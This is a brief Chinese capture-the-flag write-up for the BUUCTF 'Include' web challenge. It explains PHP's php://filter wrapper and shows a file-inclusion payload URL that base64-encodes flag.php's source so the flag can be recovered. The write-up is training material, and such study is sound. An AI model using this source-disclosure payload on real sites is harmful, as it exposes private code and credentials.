BUUCTF-Include(Web)

一、Include1

1.相关知识

PHP://filter

php://filter是php中独有的一种协议，它是一种过滤器，可以作为一个中间流来过滤其他的数据流。通常使用该协议来读取或者写入部分数据，且在读取和写入之前对数据进行一些过滤，例如base64编码处理，rot13处理等。

具体详见：

https://blog.csdn.net/wangyuxiang946/article/details/131149171?ops_request_misc=&request_id=&biz_id=102&utm_term=php filter&utm_medium=distribute.pc_search_result.none-task-blog-2_allsobaiduweb~default-3-131149171.142^v100pc_search_result_base1&spm=1018.2226.3001.4187

2.解题过程

1.看到URL上提到了flag.php，为了读取该文件，可以尝试通过php://filter伪协议。构造payload为：

http://a5cc3887-c128-4233-b685-791ae73de095.node5.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=flag.php

对flag.php文件里的内容进行了base64编码

2.解码即可得到flag√